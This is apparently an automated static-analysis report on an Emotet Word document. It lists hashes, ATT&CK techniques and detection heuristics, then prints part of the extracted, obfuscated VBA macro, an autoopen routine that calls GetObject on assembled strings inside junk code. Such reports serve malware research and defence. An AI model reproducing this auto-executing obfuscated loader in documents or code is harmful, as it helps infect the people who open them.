Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 8f55a0fe372f4750…

MALICIOUS

Office (OLE)

Size: 213.8 KB
Created: 2019-04-02 08:47:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 67884ee632cec5cecb31dbcc772222f9
SHA-1: 4ba2628864c52edf5f88f42abe5bcb8fe1e1f2b0
SHA-256: 8f55a0fe372f475033bb95db248e1126b0f6012dacc7b75faba46416c214f40b
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file was detected as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6922085-0', indicating it is likely part of the Emotet family. High-severity heuristics confirm the presence of an AutoOpen VBA macro that uses GetObject, a common technique for executing malicious code. The VBA script, though heavily obfuscated, is designed to download and execute a second-stage payload, consistent with Emotet's behavior.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6922085-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6922085-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                 Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)    32070 bytes
SHA-256: 95dd37dad50979953a0a6be2f56c1e6b4ec5338ffdade4a5f9a1172a394ea759
First 1,000 lines of the extracted script (macros.bas):
Attribute VB_Name = "rDAAUQAw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wZGo4XAx"
Attribute VB_Base = "0{0A31E3A4-3702-4AA1-9B48-043C5DB11CF5}{3E3CF29F-23CC-4DF6-B4E7-618369B36E12}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "bAQUC_"
Attribute VB_Base = "0{DE6CCDFA-94FE-401B-B295-069D4D6E2465}{E3854AE8-6060-4ECF-AAC5-EB08AF1CC44C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "RkwUoBo"
Function kAB4wAUA()
   If 777415790 = 60797655 Then
jUAUXD = jBQwUX _
+ Int(888536219 * Hex(iXwUAAo) + bDQX1A _
/ 631181946) + LGwAXZU / CLng(JAGAG1QX) - _
(ZCGBCD - lZ1C4AG / 659773652 - Tan _
(bcUAAkU) + (oAwADCB / CSng(dk1CAAG) + _
526312991 / Sgn(650647047) * (sDxUwAo + _
CByte(353970196))))
End If
   If 496451261 = 287831509 Then
ZAADAA = toABABA _
+ Int(429288972 * Hex(wAG_AAx) + LAAUBUA _
/ 662605342) + axQBBC / CLng(mDDAAA) - _
(JUxAwDx - zBXAA1A / 107470544 - Tan _
(dDQkQQ) + (JDXA1Q / CSng(zAcAAx) + _
164495061 / Sgn(484736760) * (kQ1AXA + _
CByte(604980089))))
End If
   If 801214778 = 537512672 Then
SQkDQc = vAAoDXA1 _
+ Int(512106594 * Hex(WxAAAU_) + SBAUxA _
/ 913465724) + nGXAGA / CLng(GBDxAx) - _
(pDk1GU - HUDDAoAA / 813607042 - Tan _
(iAAACUkB) + (NQBC1w / CSng(CQD4_kAC) + _
459304617 / Sgn(904678258) * (rXUAQBAQ + _
CByte(173210471))))
End If
End Function
Function U1ZAAAB1()
   If 67181097 = 769911627 Then
jBQA1A = nwUAAQAx _
+ Int(500058747 * Hex(VA1Q4A) + bAxAkcAX _
/ 701201303) + NAwUcAAQ / CLng(DDAABZA) - _
(IXBkACAU - f4DAZAU / 176785618 - Tan _
(w_ZAZ_) + (nQZQBCAA / CSng(pAAABAUB) + _
723034250 / Sgn(551362184) * (JADxQU + _
CByte(692023770))))
End If
   If 102666146 = 693360045 Then
WUDAAXDD = pQBACw _
+ Int(458245214 * Hex(h_UAA1) + mAUAADQA _
/ 740346845) + o_AUk41 / CLng(u_w_XZA) - _
(o1kBDAA4 - IA1wADAU / 210794852 - Tan _
(QAUAAAw) + (UAUACx / CSng(FAZQUUA_) + _
615856733 / Sgn(256754081) * (CAkAk_Q + _
CByte(732680326))))
End If
End Function
Sub autoopen()
VBDAACCG
End Sub
Function VBDAACCG()
On Error Resume Next
   If 799614944 = 536376509 Then
MDcXGQAo = dA4Q1AQ _
+ Int(378866859 * Hex(aADCZowA) + c4Ak4_A4 _
/ 853515782) + MxUZAoA / CLng(XAQG_A) - _
(kQBAAD - jZCAAXQX / 255064152 - Tan _
(zABxAD4) + (qCAQA1 / CSng(BXXGQQ) + _
962903447 / Sgn(374481735) * (q1oBAwA + _
CByte(759312173))))
End If
   If 137345170 = 692763874 Then
wkACGAZA = rkAwAAA _
+ Int(348527385 * Hex(cAAABDA) + IAAAxDAA _
/ 322326423) + Q_xxAwAQ / CLng(cQUAkAc) - _
(iBUDAXX - IcD_1x1 / 101213584 - Tan _
(fDAUZ1) + (zoAAAUC / CSng(jDcAwAo) + _
599516242 / Sgn(296960448) * (ZG_xUo + _
CByte(780373879))))
End If
Set hAGDUG = GetObject(wZGo4XAx.PDAAC_.Text + bAQUC_.wQCQAAAA + wZGo4XAx.PDAAC_.Text)
   If 695370438 = 564032612 Then
w414UDA = tcAABZB _
+ Int(837015383 * Hex(UxkAXA) + UDAQ4kQA _
/ 513290277) + skCAAUxk / CLng(DAAoZC) - _
(XDAZXAGA - KAAxBcC / 971976311 - Tan _
(ZAAGA4AD) + (FAAwAAA / CSng(PUDDAAZZ) + _
61785232 / Sgn(430272759) * (aQZAxAAA + _
CByte(587398117))))
End If
   If 449875966 = 98316657 Then
o4DoDk = iAACU1AX _
+ Int(241007058 * Hex(NBADAAQ) + w_UAo1AA _
/ 191239493) + mkAwGXA / CLng(lCAAUo) - _
(MAAAUA - GBADCc / 983660965 - Tan _
(ikZAGoUA) + (zXAAcc / CSng(HAADDAxB) + _
626941044 / Sgn(677713363) * (mCwXAA + _
CByte(815657807))))
End If
   If 361865615 = 995733645 Then
mcABDQAA = MwDwDAB _
+ Int(630905514 * Hex(z1XAAx) + YAoAQG _
/ 344796816) + qACUA4 / CLng(CCDxxAA) - _
(u_AQCDAA - ZAGAoD / 410981544 - Tan _
(pDDU_ABA) + (WGAAAQ
... (truncated)